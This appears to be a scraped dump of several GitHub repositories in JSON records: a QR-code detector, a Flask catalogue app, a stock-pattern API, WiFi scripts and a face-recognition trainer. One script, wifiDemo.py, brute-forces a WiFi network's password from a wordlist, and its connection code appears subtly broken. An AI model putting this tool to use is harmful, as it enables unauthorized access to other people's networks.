wScale = imgWidth / maxWidth\n thickness = 6\n\n # Load class names and YOLOv3-tiny model\n classes = open('../qrcode.names').read().strip().split('\\n')\n net = cv.dnn.readNetFromDarknet('../qrcode-yolov3-tiny.cfg', '../qrcode-yolov3-tiny.weights')\n net.setPreferableBackend(cv.dnn.DNN_BACKEND_OPENCV)\n # net.setPreferableTarget(cv.dnn.DNN_TARGET_CPU) # DNN_TARGET_OPENCL DNN_TARGET_CPU DNN_TARGET_CUDA\n\n start_time = time.monotonic()\n # Convert frame to blob\n blob = cv.dnn.blobFromImage(frame, 1/255, (416, 416), swapRB=True, crop=False)\n elapsed_ms = (time.monotonic() - start_time) * 1000\n # print('blobFromImage in %.1fms' % (elapsed_ms))\n\n def postprocess(frame, outs):\n frameHeight, frameWidth = frame.shape[:2]\n\n classIds = []\n confidences = []\n boxes = []\n\n for out in outs:\n for detection in out:\n scores = detection[5:]\n classId = np.argmax(scores)\n confidence = scores[classId]\n if confidence > threshold:\n x, y, width, height = detection[:4] * np.array([frameWidth, frameHeight, frameWidth, frameHeight])\n left = int(x - width / 2)\n top = int(y - height / 2)\n classIds.append(classId)\n confidences.append(float(confidence))\n boxes.append([left, top, int(width), int(height)])\n\n indices = cv.dnn.NMSBoxes(boxes, confidences, threshold, threshold - 0.1)\n\n for i in indices:\n i = i[0]\n box = boxes[i]\n left = box[0]\n top = box[1]\n width = box[2]\n height = box[3]\n cropped_image = frame[top:top + height, left:left + width]\n\n try:\n # cv.imshow('cropped', cropped_image)\n crop_img = str(os.path.join(crop_dir, filename))\n cv.imwrite(crop_img, cropped_image)\n except:\n pass\n\n # Draw bounding box for objects\n cv.rectangle(frame, (left, top), (left + width, top + height), (255, 0, 255), thickness)\n # Draw class name and confidence\n label = '%s:%.2f' % (classes[classIds[i]], confidences[i])\n cv.putText(frame, label, (left, top), cv.FONT_HERSHEY_SIMPLEX, 2, (255,255,255), 1)\n confidence_score.append(confidences[i])\n\n # Determine the output layer\n ln = net.getLayerNames()\n ln = [ln[i[0] - 1] for i in net.getUnconnectedOutLayers()]\n\n net.setInput(blob)\n start_time = time.monotonic()\n # Compute\n outs = net.forward(ln)\n elapsed_ms = (time.monotonic() - start_time) * 1000\n # print('forward in %.1fms' % (elapsed_ms))\n\n start_time = time.monotonic()\n postprocess(frame, outs)\n # print(postprocess(frame, outs))\n elapsed_ms = (time.monotonic() - start_time) * 1000\n # print('postprocess in %.1fms' % (elapsed_ms))\n\n if hScale > wScale:\n frame = cv.resize(frame, (int(imgWidth / hScale), maxHeight))\n elif hScale < wScale:\n frame = cv.resize(frame, (maxWidth, int(imgHeight / wScale)))\n\n #cv.imshow('QR Detection', frame)\n save_img = str(os.path.join(final_path, filename))\n cv.imwrite(save_img, frame)\n cv.destroyAllWindows()\n cv.waitKey(1)\n\ndef main():\n print(\"[INFO] Scanning images...\")\n analye_img()\n conf_score()\n print(\"[INFO] Finished scanning.\")\n print(\"Date and Time: {}\".format(datetime.datetime.now()))\n\n # Save resutls in excel\n df = pd.DataFrame(columns=['Image number','Confidence Score', 'Decoding Passed'])\n counter=0\n for i, j in zip(confidence_score, decode_result):\n df = df.append({'Image number' : counter, 'Confidence Score': i, 'Decoding Passed':j}, ignore_index=True)\n counter += 1\n writer = pd.ExcelWriter('taken_picture.xlsx')\n\n df.to_excel(writer, sheet_name='taken_picture', index=False)\n writer.save()\n\nif __name__ == \"__main__\":\n main()\n"
}
] | 12 |
jnoortheen/mobile_catalogue | https://github.com/jnoortheen/mobile_catalogue | 5137bba620f62ec43824714b503b6bf7c2b3f07e | e0153457d26b583633f199c4f2745f31bb948992 | 656793f5f8003de7816492c7a4aef2103f85dc37 | refs/heads/master | 2020-04-10T19:09:07.294400 | 2016-12-29T16:52:26 | 2016-12-29T16:52:26 | 68,092,635 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.7575757503509521,
"alphanum_fraction": 0.7575757503509521,
"avg_line_length": 21.571428298950195,
"blob_id": "731619877951e6eb7d938aa4791c2f8a53523618",
"content_id": "22330aed543dabbe9b4cb38f9844a98cb9eb15b1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 165,
"license_type": "no_license",
"max_line_length": 40,
"num_lines": 7,
"path": "/mobile_catalogue/modals/__init__.py",
"repo_name": "jnoortheen/mobile_catalogue",
"src_encoding": "UTF-8",
"text": "from flask_sqlalchemy import SQLAlchemy\r\n\r\ndb = SQLAlchemy()\r\n\r\nfrom ._Users import User\r\nfrom ._Category import Category\r\nfrom ._Item import MobileItem, ItemField\r\n"
},
{
"alpha_fraction": 0.6801646947860718,
"alphanum_fraction": 0.7021276354789734,
"avg_line_length": 26.019229888916016,
"blob_id": "ceac2394d251c44d291ac48448a0fd78aa2d10ac",
"content_id": "712b2ba0e650930aec211a93fe2a838fd832e012",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1457,
"license_type": "no_license",
"max_line_length": 91,
"num_lines": 52,
"path": "/mobile_catalogue/populate_data.py",
"repo_name": "jnoortheen/mobile_catalogue",
"src_encoding": "UTF-8",
"text": "from sqlalchemy import create_engine\r\nfrom sqlalchemy.orm import sessionmaker\r\nfrom modals import Category, db, User, ItemField, MobileItem\r\n\r\nengine = create_engine('sqlite:///app.db', echo=True)\r\ndb.metadata.bind = engine\r\nDBSession = sessionmaker(bind=engine)\r\nsess = DBSession()\r\n\r\ndb.metadata.drop_all()\r\ndb.metadata.create_all(engine)\r\n\r\n# adding users\r\nuser1 = User(\"user1\", \"[email protected]\")\r\nsess.add(user1)\r\nsess.commit()\r\nuser2 = User(\"user2\", \"[email protected]\")\r\nsess.add(user2)\r\nsess.commit()\r\n\r\n# adding categories\r\nnokia = Category(\"Nokia\")\r\nsess.add(nokia)\r\nmx = Category(\"Micromax\")\r\nsess.add(mx)\r\nsony = Category(\"Sony\")\r\nsess.add(sony)\r\nkrbm = Category(\"Karbonn\")\r\nsess.add(krbm)\r\nsess.commit()\r\n\r\n# adding mobile modals\r\nitm1 = MobileItem(\"Nokia 230\", nokia, user1)\r\nsess.add(itm1)\r\nsess.commit()\r\n\r\nitm2 = MobileItem(\"Nokia 100\", nokia, user1)\r\nsess.add(itm2)\r\nsess.commit()\r\n\r\n# adding field to those items\r\nsess.add(ItemField(\"OS\", \"Android\", itm1))\r\nsess.add(ItemField(\"Colour\", \"Android\", itm1))\r\nsess.add(ItemField(\"Item model number\", \"NOKIA 230 DUAL SIM\", itm1))\r\nsess.add(ItemField(\"Special features\", \"Dual SIM, Primary Camera, Secondary Camera\", itm1))\r\nsess.commit()\r\n\r\nsess.add(ItemField(\"OS\", \"Android\", itm2))\r\nsess.add(ItemField(\"Colour\", \"Android\", itm2))\r\nsess.add(ItemField(\"Item model number\", \"NOKIA 230 DUAL SIM\", itm2))\r\nsess.add(ItemField(\"Special features\", \"Dual SIM, Primary Camera, Secondary Camera\", itm2))\r\nsess.commit()\r\n"
},
{
"alpha_fraction": 0.7075471878051758,
"alphanum_fraction": 0.7075471878051758,
"avg_line_length": 24.5,
"blob_id": "7858d403467aef186bcd185b34882b3ceec76603",
"content_id": "0ba1468d4dddf557822c42038741b28434ce4408",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 212,
"license_type": "no_license",
"max_line_length": 48,
"num_lines": 8,
"path": "/mobile_catalogue/catalog.wsgi",
"repo_name": "jnoortheen/mobile_catalogue",
"src_encoding": "UTF-8",
"text": "import sys\r\nimport os\r\n\r\n# insert the path where app module can be loaded\r\npath = os.path.join(os.path.dirname(__file__))\r\nif path not in sys.path:\r\n sys.path.append(path)\r\nfrom app import app as application\r\n"
}
] | 3 |
milanvadher/pattern_poc | https://github.com/milanvadher/pattern_poc | f5447493b9bad53e80efb600ff7116316e6ce748 | 8a35e4ade2e7d9d2bb97031d20878dde06053da0 | 99552f3421f6e9e2aedbd9abe7a8a477039738b6 | refs/heads/master | 2020-03-29T02:30:55.090587 | 2018-10-29T10:45:00 | 2018-10-29T10:45:00 | 149,440,812 | 1 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6577102541923523,
"alphanum_fraction": 0.6670560836791992,
"avg_line_length": 9.325301170349121,
"blob_id": "9dce7a23be09ab767d302fbb494cc55ebbda7f19",
"content_id": "45eeb907defd3a11757b5ef8023c5f1cdeae4992",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 856,
"license_type": "no_license",
"max_line_length": 58,
"num_lines": 83,
"path": "/README.md",
"repo_name": "milanvadher/pattern_poc",
"src_encoding": "UTF-8",
"text": "# Pattern Generation\n\n## Software Required\n\n### 1. Python 3.x.x\n\n```bash\nsudo add-apt-repository ppa:jonathonf/python-3.6\n```\n\n```bash\nsudo apt-get update\n```\n\n```bash\nsudo apt-get install python3.6\n```\n\n### 2. Pip / Pip3\n\n```bash\nsudo apt-get install python-pip python-dev build-essential\n```\n\n```bash\nsudo pip install --upgrade pip\n```\n\n## Library Required\n\n* Flask\n\n```bash\nsudo apt-get install python-flask\n```\n\n* Pymongo\n\n```bash\nsudo apt-get install python-pymongo\n```\n\n* Pandas\n\n```bash\nsudo apt-get install python-pandas\n```\n\n* Numpy\n\n```bash\nsudo apt-get install python-numpy\n```\n\n* Scipy\n\n```bash\nsudo apt-get install python-scipy\n```\n\n* Request\n\n```python\nsudo pip install request\n```\n\n* Jsonify\n\n```python\nsudo pip install jsonify\n```\n\n* flask_cors\n\n```python\nsudo pip install flask_cors\n```\n\n## Commands to Excecute\n\n```bash\npython test.py\n```"
},
{
"alpha_fraction": 0.49616339802742004,
"alphanum_fraction": 0.5069707036018372,
"avg_line_length": 28.562299728393555,
"blob_id": "4aa3bc76a5e6d4e805479b31e905e5af4ec5ae56",
"content_id": "1ddd59e098ec26e4dcf43411fef2b2b1400c0869",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9253,
"license_type": "no_license",
"max_line_length": 81,
"num_lines": 313,
"path": "/test.py",
"repo_name": "milanvadher/pattern_poc",
"src_encoding": "UTF-8",
"text": "from flask import Flask, request, jsonify\nfrom pymongo import MongoClient\nfrom bson.json_util import dumps\n# from flask_cors import CORS\nimport pandas as pd\nimport numpy as np\nfrom scipy.signal import argrelextrema\n\napp = Flask(__name__)\n# CORS(app)\nclient = MongoClient('localhost', 27017) # localDB\n\n# connect to db\ndb = client.pattern_poc\n\n# connect to collection\ntestTable = db.test\ndataTable = db.dummyData\n\n\ndef remove_duplication(seq):\n seen = set()\n seen_add = seen.add\n return [x for x in seq if not (x in seen or seen_add(x))]\n\n\n# test api\[email protected]('/test')\ndef get_apitest():\n return jsonify({'msg': 'Api is working'})\n\n\n# test db api\[email protected]('/dbtest')\ndef get_dbtest():\n return dumps(testTable.find({}))\n\n\n# upload bulk data\[email protected]('/uploadCSV', methods=['POST'])\ndef upload_csv():\n # delete all data\n dataTable.delete_many({})\n\n # Create variable for uploaded file\n df = pd.read_csv(request.files['fileupload'])\n\n # convert data to dict\n records_ = df.to_dict(orient='records')\n\n # upload data to db\n dataTable.insert_many(records_)\n\n del df\n del records_\n return jsonify({'success': 'Data uploaded successfully!!'})\n\n\n# get Forex (Uploaded data)\[email protected]('/getData')\ndef get_dummyData():\n _date = []\n _open = []\n _high = []\n _low = []\n _close = []\n _volume = []\n for data in dataTable.find({}):\n _date.append(data['Time (UTC)'])\n _open.append(data['Open'])\n _high.append(data['High'])\n _low.append(data['Low'])\n _close.append(data['Close'])\n _volume.append(data['Volume '])\n\n return jsonify(\n {\n 'date': _date\n },\n {'open': _open},\n {'high': _high},\n {'low': _low},\n {'close': _close},\n {'volume': _volume},\n )\n # return dumps(dataTable.find({}))\n\n\n# for triangle pattern optimised\ndef best_pattern(pattern):\n finalPatterns = []\n if pattern:\n # print(pattern)\n temp = []\n for last in pattern:\n temp.append(last[2][1])\n finalPatterns.append(pattern[temp.index(min(temp))])\n print(finalPatterns, '***************')\n\n\[email protected]('/getTrianglePattern')\ndef triangle_pattern():\n volume = []\n date = []\n trianglePattern = []\n firstpoint = []\n peakoint = []\n lastpoint = []\n\n for data in dataTable.find({}):\n volume.append(data['Volume '])\n date.append(data['Time (UTC)'])\n\n data = pd.DataFrame({'vol': volume})\n data = data.drop_duplicates(keep=False)\n\n data.columns = [['vol']]\n\n _volume = data['vol']\n\n # print(_volume)\n\n for i in range(0, len(_volume)):\n max_idx = list(\n argrelextrema(_volume.values[:i], np.greater, order=10)[0])\n min_idx = list(argrelextrema(_volume.values[:i], np.less, order=10)[0])\n\n idx = max_idx + min_idx + [len(_volume[:i] - 1)]\n\n idx.sort()\n\n current_idx = idx[-3:]\n\n start = min(current_idx)\n end = max(current_idx)\n\n current_pat = _volume.values[current_idx]\n\n peaks = _volume.values[idx]\n\n if (len(current_idx) == 3):\n XA = current_pat[1] - current_pat[0]\n AB = current_pat[2] - current_pat[1]\n\n if XA > 0 and AB < 0:\n # trianglePattern.append(current_pat)\n trianglePattern.append([\n [\n date[volume.index(current_pat[0])],\n volume[volume.index(current_pat[0])]\n ],\n [\n date[volume.index(current_pat[1])],\n volume[volume.index(current_pat[1])]\n ],\n [\n date[volume.index(current_pat[2])],\n volume[volume.index(current_pat[2])]\n ],\n ])\n firstpoint.append(volume[volume.index(current_pat[0])])\n peakoint.append(volume[volume.index(current_pat[1])])\n 
lastpoint.append(volume[volume.index(current_pat[2])])\n\n # peakoint = remove_duplication(peakoint)\n # firstpoint = remove_duplication(firstpoint)\n # lastpoint = remove_duplication(lastpoint)\n firstPattern = []\n finalPatterns = []\n first = trianglePattern[0][0][1]\n for i in range(0, len(trianglePattern)):\n if first != trianglePattern[i][0][1]:\n if firstPattern:\n # print(pattern)\n temp = []\n for last in firstPattern:\n temp.append(last[2][1])\n finalPatterns.append(firstPattern[temp.index(min(temp))])\n # print(finalPatterns, '***************')\n firstPattern = []\n first = trianglePattern[i][0][1]\n # break\n else:\n # print(i, trianglePattern[i])\n firstPattern.append(trianglePattern[i])\n\n # print(\"PeakPoints : \", len(peakoint), \" : \")\n # print(\"FirstPoints : \", len(firstpoint), \" : \")\n # print(\"LastPoints : \", len(lastpoint), \" : \")\n print(\"total triangle : \", len(finalPatterns))\n \n del volume\n del date\n del trianglePattern\n del firstpoint\n del peakoint\n del lastpoint\n del firstPattern\n\n return (jsonify({\"trianglePattern\": finalPatterns}))\n\n# @app.route('/getZigZagPattern')\n# def zigzag_pattern():\n# volume = []\n# date = []\n# zigzagPattern = []\n# firstpoint = []\n# peakoint = []\n# lastpoint = []\n\n# for data in dataTable.find({}):\n# volume.append(data['Volume '])\n# date.append(data['Time (UTC)'])\n\n# data = pd.DataFrame({'vol': volume})\n# data = data.drop_duplicates(keep=False)\n\n# data.columns = [['vol']]\n\n# _volume = data['vol']\n\n# # print(_volume)\n\n# for i in range(0, len(_volume)):\n# max_idx = list(\n# argrelextrema(_volume.values[:i], np.greater, order=10)[0])\n# min_idx = list(argrelextrema(_volume.values[:i], np.less, order=10)[0])\n\n# idx = max_idx + min_idx + [len(_volume[:i] - 1)]\n\n# idx.sort()\n\n# current_idx = idx[-6:]\n\n# start = min(current_idx)\n# end = max(current_idx)\n\n# current_pat = _volume.values[current_idx]\n\n# peaks = _volume.values[idx]\n\n# if (len(current_idx) == 6):\n# XA = current_pat[1] - current_pat[0]\n# AB = current_pat[2] - current_pat[1]\n# BC = current_pat[3] - current_pat[2]\n# CD = current_pat[4] - current_pat[3]\n# DA = current_pat[5] - current_pat[4]\n\n# if XA > 0 and AB < 0 and BC > 0 and CD < 0 and DA > 0:\n# # zigzagPattern.append(current_pat)\n# zigzagPattern.append([\n# [\n# date[volume.index(current_pat[0])],\n# volume[volume.index(current_pat[0])]\n# ],\n# [\n# date[volume.index(current_pat[1])],\n# volume[volume.index(current_pat[1])]\n# ],\n# [\n# date[volume.index(current_pat[2])],\n# volume[volume.index(current_pat[2])]\n# ],\n# [\n# date[volume.index(current_pat[3])],\n# volume[volume.index(current_pat[3])]\n# ],\n# [\n# date[volume.index(current_pat[4])],\n# volume[volume.index(current_pat[4])]\n# ],\n# [\n# date[volume.index(current_pat[5])],\n# volume[volume.index(current_pat[5])]\n# ],\n# ])\n# firstpoint.append(volume[volume.index(current_pat[0])])\n# peakoint.append(volume[volume.index(current_pat[1])])\n# lastpoint.append(volume[volume.index(current_pat[2])])\n\n# # peakoint = remove_duplication(peakoint)\n# # firstpoint = remove_duplication(firstpoint)\n# # lastpoint = remove_duplication(lastpoint)\n# firstPattern = []\n# finalPatterns = []\n# first = zigzagPattern[0][0][1]\n# for i in range(0, len(zigzagPattern)):\n# if first != zigzagPattern[i][0][1]:\n# if firstPattern:\n# # print(pattern)\n# temp = []\n# for last in firstPattern:\n# temp.append(last[2][1])\n# finalPatterns.append(firstPattern[temp.index(min(temp))])\n# # print(finalPatterns, 
'***************')\n# firstPattern = []\n# first = zigzagPattern[i][0][1]\n# # break\n# else:\n# # print(i, zigzagPattern[i])\n# firstPattern.append(zigzagPattern[i])\n\n# # print(\"PeakPoints : \", len(peakoint), \" : \")\n# # print(\"FirstPoints : \", len(firstpoint), \" : \")\n# # print(\"LastPoints : \", len(lastpoint), \" : \")\n# print(\"total zigzag : \", len(finalPatterns))\n\n# return (jsonify({\"zigzagPattern\": finalPatterns}))\n\n\n# run api\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=5001)\n"
}
] | 2 |
JChenghao/firstGit | https://github.com/JChenghao/firstGit | 43932f7a8d84aed8c486be77fb08a219962cf6ea | 2add84e4ba053a5c758ba7a0d4ac4d7106080845 | 5068fb2b3c8080d530ef2a0a328cdfb8fc8b53e1 | refs/heads/master | 2020-05-15T21:55:36.179079 | 2019-04-24T09:40:42 | 2019-04-24T09:40:42 | 182,512,318 | 0 | 0 | null | 2019-04-21T09:06:14 | 2019-04-24T09:34:02 | 2019-04-24T09:40:43 | Python | [
{
"alpha_fraction": 0.5928381681442261,
"alphanum_fraction": 0.5981432199478149,
"avg_line_length": 21.878787994384766,
"blob_id": "8f968f85c66281a824932d6a440c4f71652526d6",
"content_id": "4dca59ab5d9f904524544088cb3c58ff6b198621",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 910,
"license_type": "no_license",
"max_line_length": 49,
"num_lines": 33,
"path": "/testWiFi.py",
"repo_name": "JChenghao/firstGit",
"src_encoding": "UTF-8",
"text": "#!/user/bin/env python3\n#-*- coding: utf-8 -*-\nimport pywifi\nfrom pywifi import const\n\ndef createCard():\n #创建一个无限网卡\n wifi = pywifi.PyWiFi()\n #获取无限网卡\n card = wifi.interfaces()[0]\n #打印无限网卡名字\n print(card.name())\n #打印连接状态\n # print(card.status())\n if card.status() == const.IFACE_DISCONNECTED:\n print(\"未连接\")\n elif card.status() == const.IFACE_CONNECTED:\n print(\"已连接\")\n#扫描\ndef scanWifi():\n wifi = pywifi.PyWiFi()\n iface = wifi.interfaces()[0]\n #扫描附近wifi\n iface.scan()\n #获取扫描之后的结果--结果是一个列表\n numWifi = iface.scan_results()\n # print(numWifi)\n for data in numWifi:\n #遍历后打印在附近扫描出来wifi的名称用ssid -----中文就会乱码\n print(data.ssid)\nif __name__ == '__main__':\n #createCard()\n scanWifi()"
},
{
"alpha_fraction": 0.5753575563430786,
"alphanum_fraction": 0.5918591618537903,
"avg_line_length": 22.316238403320312,
"blob_id": "75885fa4334559bfcccf42a23ada780aadc678fd",
"content_id": "65b79dfd13665d8029af870508d3463a1fcbe01f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3567,
"license_type": "no_license",
"max_line_length": 81,
"num_lines": 117,
"path": "/wifiDemo.py",
"repo_name": "JChenghao/firstGit",
"src_encoding": "UTF-8",
"text": "#!/user/bin/env python3\n#-*- coding: utf-8 -*-\nfrom tkinter import *\nfrom pywifi import const\nimport pywifi\nimport time\n\n\"\"\"\n1.导入模块\n2.获取第一个无线网卡\n3.断开所有的wifi\n4.读取密码本\n5.设置睡眠时间-模拟连接\n\"\"\"\n#测试连接\ndef wifiConnect(str,wifiName):\n #创建一个窗口无线对象\n wifi = pywifi.PyWiFi()\n #抓取第一个无线网卡\n ifaces = wifi.interfaces()[0]\n #断开所有wifi的连接\n ifaces.disconnect()\n #休息一秒\n time.sleep(1)\n\n #判断连接状态\n if ifaces.status() == const.IFACE_DISCONNECTED:\n #创建wifi连接文件\n proFile = pywifi.PyWiFi()\n\n \"\"\"\n 下面可以直接用\n \"\"\"\n #添加wifi的名称\n proFile.ssid = wifiName\n #添加wifi的加密算法\n # proFile.akm.append(const.AKM_TYPE_WPA2PSK)\n proFile.akm =const.AKM_TYPE_WPA2PSK\n #wifi的密码\n proFile.key = str\n #网卡的开发\n proFile.auth = const.AUTH_ALG_OPEN\n\n #删除所有的wifi文件\n ifaces.remove_all_network_profiles()\n #设定新的连接文件\n tepProFile = ifaces.add_network_profile(proFile)\n #连接\n ifaces.connect(tepProFile)\n time.sleep(4)\n\n if ifaces.status() == const.IFACE_CONNECTED:\n return True\n else:\n return False\n\n else:\n print(\"已经连接成功!\")\n\n\n\n\n#读取密码\ndef readPwd():\n #获取用户输入的wifi名称\n userInputWiFiName = entry.get()\n # print(userInputWiFiName)\n #获取密码本路径\n notePwdPath = r'F:\\PycharmSave\\firstGit\\wifi密码本.txt'\n file = open(notePwdPath,\"r\")\n while True:\n try:\n #读取密码本 一行一行的读\n myStr = file.readline()\n # print(myStr)\n #测试连接\n bool = wifiConnect(myStr,userInputWiFiName)\n if bool:\n print(\"密码正确\",myStr)\n else:\n # print(\"密码错误\",myStr)\n #在列表框中打印 END表示添加到最后\n text.insert(END,\"密码错误:\"+myStr)\n #让文本滚动 让他一直显示最后一行\n text.see(END)\n #更新一下\n text.update()\n except:\n #跳出本次循环,执行下一次循环\n continue\n\n#创建一个窗口对象\nwindow = Tk()\n#修改窗口显示的名字\nwindow.title(\"WIFI万能钥匙\")\n#调整窗口的大小以及在屏幕中显示的位置 注意:大小是用x来表示 位置坐标用+来表示 他们都是用的geometry方法,所以可以组合在一起使用\nwindow.geometry(\"500x400+400+200\")\n\n#标签控件 显示名称用text,\nlable = Label(window, text = \"输入要破解的wifi名称:\")\n#标签位置定位 grid网格式布局 pack 包 place 位置 三种定位 grid默认属性:row = 0 ,column = 0\nlable.grid(row = 0, column = 0)\n\n#输入标签 字体大小会影响输入框的高度\nentry = Entry(window, font = (\"微软雅黑\",20))\nentry.grid(row = 0, column = 1)\n\n#列表框控件 Listbox\ntext = Listbox(window, font = (\"微软雅黑\",15), width = 40,height = 10)\n#columnspan组建是所跨越的列数\ntext.grid(row = 1,columnspan = 2)\n\n#按钮控件 button 再点击按钮的时候 肯定会触发一个事件用command\nbutton = Button(window, text = \"开始破解\", width = 10, height = 2, command = readPwd)\nbutton.grid(row = 2 ,columnspan = 2)\n#显示窗口 mainloop()消息循环\nwindow.mainloop()"
}
] | 2 |
labyrinth7x/multi-task-face-recognition-framework | https://github.com/labyrinth7x/multi-task-face-recognition-framework | f7dde99beec1170397b1dfd3839c340c62796451 | 63329e7635b0a0245ce5532e52a28a773b313ae3 | 1eb76946b3738cc0db34c122019533dfe8c014c9 | refs/heads/master | 2022-11-10T21:06:55.593955 | 2020-07-01T02:48:34 | 2020-07-01T02:48:34 | 255,211,951 | 3 | 1 | null | null | null | null | null | [
{
"alpha_fraction": 0.6573591828346252,
"alphanum_fraction": 0.6682441830635071,
"avg_line_length": 41.2599983215332,
"blob_id": "f42617c00d26d06c89661a89de999483595169d3",
"content_id": "395ebbd641fff6d985e8589cf424d19d27753fb3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2113,
"license_type": "no_license",
"max_line_length": 125,
"num_lines": 50,
"path": "/multitask.py",
"repo_name": "labyrinth7x/multi-task-face-recognition-framework",
"src_encoding": "UTF-8",
"text": "from config_multi import get_config\nimport os\nfrom Learner_multi import face_learner\nfrom pathlib import Path\nimport argparse\n\n# python train.py -net mobilefacenet -b 200 -w 4\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='for face verification')\n parser.add_argument('-e', '--epochs', help='training epochs', default=20, type=int)\n parser.add_argument('-net', '--net_mode', help='which network, [ir, ir_se, mobilefacenet]',default='ir_se', type=str)\n parser.add_argument('-depth', '--net_depth', help='how many layers [50,100,152]', default=50, type=int)\n parser.add_argument('-lr','--lr',help='learning rate',default=1e-3, type=float)\n parser.add_argument('-b', '--batch_size', help='batch_size', default=100, type=int)\n parser.add_argument('-w', '--num_workers', help='workers number', default=3, type=int)\n parser.add_argument('-d', '--data_mode', help='use which database, [vgg, ms1m, emore, concat]',default='emore', type=str)\n parser.add_argument('-meta_file', type=str)\n parser.add_argument('-pseudo_folder', type=str)\n parser.add_argument('-remove_single', action='store_true')\n parser.add_argument('-resume', type=str, default=None)\n parser.add_argument('-device', type=int, default=None)\n args = parser.parse_args()\n\n conf = get_config()\n \n if args.net_mode == 'mobilefacenet':\n conf.use_mobilfacenet = True\n else:\n conf.net_mode = args.net_mode\n conf.net_depth = args.net_depth \n \n conf.lr = args.lr\n conf.batch_size = args.batch_size\n conf.num_workers = args.num_workers\n conf.data_mode = args.data_mode\n conf.pseudo_folder = args.pseudo_folder\n conf.meta_file = args.meta_file\n conf.work_path = Path(conf.meta_file.replace('labels.txt', str(args.remove_single)))\n conf.model_path = conf.work_path/'models'\n conf.log_path = conf.work_path/'log'\n conf.save_path = conf.work_path/'log'\n conf.remove_single = args.remove_single\n conf.resume = args.resume\n conf.device = args.device\n\n\n learner = face_learner(conf)\n\n learner.train(conf, args.epochs)\n"
},
{
"alpha_fraction": 0.679173469543457,
"alphanum_fraction": 0.7145187854766846,
"avg_line_length": 48.702701568603516,
"blob_id": "3728be2cc1ba9e82f2bdc85cf719470426d05afd",
"content_id": "55907cb8388601b9c3876d9c44369d3aa09a97fa",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1905,
"license_type": "no_license",
"max_line_length": 402,
"num_lines": 37,
"path": "/README.md",
"repo_name": "labyrinth7x/multi-task-face-recognition-framework",
"src_encoding": "UTF-8",
"text": "# Multi-task Face Recognition Framework\n\n## Introduction\nThis repository is a multi-task face recognition framework, built on top of the [PyTorch implementation](https://github.com/TreB1eN/InsightFace_Pytorch) of ArcFace. \nIt is for our IJCNN'20 paper [Neighborhood-Aware Attention Network for Semi-supervised Face Recognition](https://drive.google.com/file/d/1fNarQTLGRcmf06C1Uhytjcbn3U9hknf0/view?usp=sharing). \nYou may refer to the repository [NAAN](https://github.com/labyrinth7x/NAAN) for the fully semi-supervised implementation of our paper.\n\n## Requirments\n- python >= 3.5\n- pytorch >= 1.0.0\n- numpy\n- tensorboardX\n\n## Data Preparation\n- Download the full MS-Celeb-1M realeased by [ArcFace](https://github.com/deepinsight/insightface) from [baidu](https://pan.baidu.com/s/1S6LJZGdqcZRle1vlcMzHOQ) or [dropbox](https://www.dropbox.com/s/wpx6tqjf0y5mf6r/faces_ms1m-refine-v2_112x112.zip?dl=0), and move them to the folder ```faces_emore```.\n- Download the splitted image list produced by [learn-to-cluster](https://github.com/yl-1993/learn-to-cluster) from [GoogleDrive](https://drive.google.com/file/d/1kurPWh6dm3dWQOLqUAeE-fxHrdnjaULB/view?usp=sharing) or [OneDrive](https://mycuhk-my.sharepoint.com/:u:/g/personal/1155095455_link_cuhk_edu_hk/ET7lHxOXSjtDiMsgqzLK9LgBi_QW0WVzgZdv2UBzE1Bgzg?e=jZ7kCS), and move them to the folder ```lists```.\n- Re-arrange the dataset using ```preprocess.py```. The folder structure of ```emore``` is the same as:\n ```\n emore\n ├── trainset\n ├── testset\n ├── split_1\n ├── split_2\n ├── split_3\n ├── split_4\n ├── split_5\n ├── split_6\n ├── split_7\n ├── split_8\n ├── split_9\n ```\n\n## Training\n```\nsh train_multi.sh\n```\nModify the param ```path``` in ```train_multi.sh``` to the directory of the generated pseudo-label file ```split{}_labels.txt```.\n"
},
{
"alpha_fraction": 0.5971523523330688,
"alphanum_fraction": 0.6141740679740906,
"avg_line_length": 33.98127365112305,
"blob_id": "4d1cfe7dc9b570c355d1dfde3c692acd413ecf5f",
"content_id": "ad2cdee44cdbde07d4489892d78cece7137d120d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9341,
"license_type": "no_license",
"max_line_length": 129,
"num_lines": 267,
"path": "/data_pipe.py",
"repo_name": "labyrinth7x/multi-task-face-recognition-framework",
"src_encoding": "UTF-8",
"text": "from pathlib import Path\nfrom torch.utils.data import Dataset, ConcatDataset, DataLoader\nfrom torchvision import transforms as trans\nfrom torchvision.datasets import ImageFolder, DatasetFolder\nfrom PIL import Image, ImageFile\nImageFile.LOAD_TRUNCATED_IMAGES = True\nimport numpy as np\nimport torch\nimport mxnet as mx\nimport cv2\nimport bcolz\nimport pickle\nfrom tqdm import tqdm\nimport os\nimport sys\nfrom torch.utils.data import Sampler\n\ncount = [0, 584013, 1164672, 1740301, 2314488, 2890517, 3465678, 4046365, 4628523, 5206761]\n\ndef de_preprocess(tensor):\n return tensor*0.5 + 0.5\n \ndef get_train_dataset(imgs_folder):\n train_transform = trans.Compose([\n trans.RandomHorizontalFlip(),\n trans.ToTensor(),\n trans.Normalize([0.5, 0.5, 0.5], [0.5, 0.5, 0.5])\n ])\n ds = ImageFolder(str(imgs_folder), train_transform)\n class_num = ds[-1][1] + 1\n print('loading train dataset:{} done'.format(class_num))\n return ds, class_num\n\nclass SubsetSampler(Sampler):\n r\"\"\"Samples elements from a given list of indices, without replacement.\n\n Arguments:\n indices (sequence): a sequence of 